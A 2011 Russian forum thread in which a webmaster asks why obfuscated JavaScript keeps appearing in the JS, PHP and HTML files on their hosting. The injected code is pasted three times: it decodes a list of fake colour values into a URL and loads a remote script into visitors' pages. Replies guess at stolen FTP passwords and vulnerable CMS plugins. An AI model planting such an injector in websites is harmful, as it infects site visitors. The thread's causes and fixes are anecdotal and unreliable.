Просмотр полной версии : Вирус детектед!
Чуть ли каждый день на хостинге каким то образом на js файлах дописывается такой код:
if (typeof(redef_colors)=="undefined") {
var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e7a84', '#82837e', '#40403d', '#727e7c', '#3e7982', '#3e7980', '#847481', '#883d7c', '#787d3d', '#7f777f', '#314d00');
var redef_colors = 1;
var colors_picked = 0;
function div_pick_colors(t,styled) {
var s = "";
for (j=0;j<t.length;j++) {
var c_rgb = t[j];
for (i=1;i<7;i++) {
var c_clr = c_rgb.substr(i++,2);
if (c_clr!="00") s += String.fromCharCode(parseInt(c_clr,16)-15);
}
}
if (styled) {
s = s.substr(0,36) + s.substr(36,(s.length-38)) + div_colors[1].substr(0,1)+new Date().getTime() + s.substr((s.length-2));
} else {
s = s.substr(36,(s.length-38)) + div_colors[1].substr(0,1)+new Date().getTime();
}
return s;
}
function try_pick_colors() {
try {
if(!document.getElementById || !document.createElement){
document.write(div_pick_colors(div_colors,1));
} else {
var new_cstyle=document.createElement("scripl");
new_cstyle.type="text/javascripl";
new_cstyle.src=div_pick_colors(div_colors,0);
document.getElementsByTagName("head")[0].appendChild(new_cstyle);
}
} catch(e) { }
try {
check_colors_picked();
} catch(e) {
setTimeout("try_pick_colors()", 500);
}
}
try_pick_colors();
}
А в PHP файлах дописывается такой код:
<scripl type="text/javascripl">
if (typeof(redef_colors)=="undefined") {
var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e7a84', '#82837e', '#40403d', '#727e7c', '#3e7982', '#3e7980', '#847481', '#883d7c', '#787d3d', '#7f777f', '#314d00');
var redef_colors = 1;
var colors_picked = 0;
function div_pick_colors(t,styled) {
var s = "";
for (j=0;j<t.length;j++) {
var c_rgb = t[j];
for (i=1;i<7;i++) {
var c_clr = c_rgb.substr(i++,2);
if (c_clr!="00") s += String.fromCharCode(parseInt(c_clr,16)-15);
}
}
if (styled) {
s = s.substr(0,36) + s.substr(36,(s.length-38)) + div_colors[1].substr(0,1)+new Date().getTime() + s.substr((s.length-2));
} else {
s = s.substr(36,(s.length-38)) + div_colors[1].substr(0,1)+new Date().getTime();
}
return s;
}
function try_pick_colors() {
try {
if(!document.getElementById || !document.createElement){
document.write(div_pick_colors(div_colors,1));
} else {
var new_cstyle=document.createElement("scripl");
new_cstyle.type="text/javascripl";
new_cstyle.src=div_pick_colors(div_colors,0);
document.getElementsByTagName("head")[0].appendChild(new_cstyle);
}
} catch(e) { }
try {
check_colors_picked();
} catch(e) {
setTimeout("try_pick_colors()", 500);
}
}
try_pick_colors();
}
</scripl>
Что эти коды делает? Знаю что вирь поймал, но отловить никак не могу. Менял пароли на ftp, все равно также.. Что делать? Помогите плииз
Даже пробовал файлы на чтение только ставить, все равно вирь умудряется внедряться :(:(:(:mad:
Не все php файлы заражает, а выборочно - штуки 3-4, а js поголовно((
Колхозник
23-03-2011, 10:29
Если хостинг бесплатный, то может реклама?
obi1kenobi
23-03-2011, 10:34
встречался с аналогичным случаем, только файлы хтмл и хостинг джино - кстати платный
тоже дописывался левый код в конец файлов.
проблема решилась закрытием фтп доступа
вот еще на html фалах такое прописалось:
<scripl type="text/javascripl">
if (typeof(redef_colors)=="undefined") {
var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e7a84', '#82837e', '#40403d', '#727e7c', '#3e7982', '#3e7980', '#847481', '#883d7c', '#787d3d', '#7f777f', '#314d00');
var redef_colors = 1;
var colors_picked = 0;
function div_pick_colors(t,styled) {
var s = "";
for (j=0;j<t.length;j++) {
var c_rgb = t[j];
for (i=1;i<7;i++) {
var c_clr = c_rgb.substr(i++,2);
if (c_clr!="00") s += String.fromCharCode(parseInt(c_clr,16)-15);
}
}
if (styled) {
s = s.substr(0,36) + s.substr(36,(s.length-38)) + div_colors[1].substr(0,1)+new Date().getTime() + s.substr((s.length-2));
} else {
s = s.substr(36,(s.length-38)) + div_colors[1].substr(0,1)+new Date().getTime();
}
return s;
}
function try_pick_colors() {
try {
if(!document.getElementById || !document.createElement){
document.write(div_pick_colors(div_colors,1));
} else {
var new_cstyle=document.createElement("scripl");
new_cstyle.type="text/javascripl";
new_cstyle.src=div_pick_colors(div_colors,0);
document.getElementsByTagName("head")[0].appendChild(new_cstyle);
}
} catch(e) { }
try {
check_colors_picked();
} catch(e) {
setTimeout("try_pick_colors()", 500);
}
}
try_pick_colors();
}
как закрыть доступ? Пользуюсь тотал командрем, просто удалить из списка?
obi1kenobi
23-03-2011, 10:40
на сайте хостера логинишься и там в панели управления ищешь фтп доступ вкл/выкл
я уже просто заебся с бекапа файлы восстанавливать..
ну мне этот фтп доступ ежедневно нужен буквально на минут 5-10, или каждый день доступ включать и отключать? :confused:
Убрал анонимный доступ на ftp, поможет?
не сохраняй данные фтп-доступа на компе, ни в каких прогах, и поменяй пароль
Вот так я и делал, но вирь опять как то пролез :confused::(
Значит вирус следует искать на своем компе?
На моем компе не может быть, т.к. седня в 3 час ночи вирус проявил свою активность, а в это время мой комп был выключен :confused:
Когда ты коннектишься по ftp, то твой пароль передаётся в открытом, назашифрованном виде. Воруй его, не хочу.
что мне сделать, чтобы не воровали? Доступ на ftp закрыть не вариант, т.к. я постоянно его использую :confused:
Тряси провайдера на предмет зашифрованных протоколов передачи.
Или хотя бы ограничить доступ по IP адресам.
obi1kenobi
23-03-2011, 13:04
Кураеб, а веб интерфейс не подойдет тебе ? Неудобно конечно, но попробуй закрой доступ по фтп и поюзай его
что за сайт? движок какой? версия? гугли на тему хаков, обнови движок, может через плагин кривой хакают
Кураеб, у тебя Сапа случайно не стоит?
У меня такая же проблема, как у тебя. Подозреваю Сапу в том числе.
движок oscommerce, менял пароли, все ставил только на чтение даже, все равно лезет. До хостеров дозвониться как до кремля
Что такое сапа? Вчера удалил полность firefox и заново установил его, вот сегодня пока вирус не атаковал. Может из-за него?
Носки В Полоску
30-03-2011, 12:08
Ыыы))) создал файлик с этим скриптом, так нод по рукам надавал - даж сохранить не успел))))
Посмотри, может новые пользователи-администраторы появились в списке пользователей. Не покупал готовые шаблоны?
Кажется, oscommerce уже давно заброшена и дырявая. Та компания теперь гонит Magento.
письмо написал, ща жду ответа от них
Все перепроверил, шаблоны не покупали, сами делали.. админов в списке новых нет.. :( Очень страноо все это..
а че этот скрипт ваще делает? :D
В общем, проблема решилась! Виновником оказался браузер фаерфокс, переустановил и все норм стало